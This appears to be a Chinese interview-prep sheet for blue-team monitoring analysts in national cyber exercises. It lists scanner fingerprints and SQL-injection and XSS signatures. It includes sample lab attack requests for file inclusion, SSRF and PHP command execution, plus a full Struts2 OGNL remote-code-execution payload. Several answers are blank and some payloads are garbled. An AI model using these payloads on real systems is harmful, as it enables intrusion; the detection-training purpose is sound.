一、有没有干过干过护网
答:(去年)干过。电信、移动、国家电网、能源局(一个就ok)
二、护网过程中从事那个岗位
岗位:监控岗(初级)、事件分析(中级)、研判组(高级)
三、在监控岗发现过什么事件
手工与工具渗透,如果是工具渗透的话,监控设备可以看到各工具指纹:
工具:
(1)Awvs
Awvs在请求的Url,Headers, Body三项里随机包含了能代表自己的特征信息
<1> Url:
acunetix-wvs-test-for-some-inexistent-file
by_wvs
acunetix_wvs_security_test
acunetix
acunetix_wvs
acunetix_test
(2)Netsparker
Netsparker依然在请求的Url,Headers, Body三项里随机包含了能代表自己的特征信息
<1> Url
netsparker
Netsparker
ns: netsparker
<2> Headers
X-Scanner: Netsparker
Location: Netsparker
Accept: netsparker/check
Cookie: netsparker
Cookie: NETSPARKER
手工:
例如:网页漏洞(owasp top 10) :
1、sql注入攻击特证:
’
and 1=1
or 1=1
order by
union
information_schema
insert
update
updatexml
exec master…xp_cmdshell
having
group by
sleep
select
2、xss跨站脚本攻击
'">
(3)防止后台对输入的内容进行替换,采用拼拼凑的输入方法。
例:<sc
例:使用事件属性onerror():
3、任意文件下载或上传
任意文件下载指纹是 …/或./
任意文件上传指纹是 文件上传路径或success或文件上传成功,另外看一下文件扩展名是否为脚本
4、文件包含漏洞
PHP中的四个包含文件函数include(),include_once(),require()和require_once()。
特征:参数后面存在XX.jpg文件
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt
http://192.168.0.103/dvwa/vulnerabilities/fi/page=file:///C:/xampp/htdocs/dvwa/php.ini
post包里面存在
<?php system('net user');?>5、服务器端请求伪造(ssrf)
http://192.168.16.105:90/pikachu/vul/ssrf/ssrf_curl.php?url=https://www.baidu.com
http://192.168.16.105:90/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306
6、命令执行与反序列化
Content-Type: %{(#fuck=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)😦(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘whoami’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{’/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
四、是否做过事件分析
简单的做过4-5个,例如:
五、事件分析报告写过没有
写过,报告里面有那些内容:
六、怎么样区分是否是误报
7、看过那些安全设备
奇安信天眼、
绿盟态势感知、
启明IDS天阗(IDS是英文"Intrusion Detection Systems"的缩写,中文意思是"入侵检测系统")、
WAF(绿盟、安恒、深信服、启明星辰)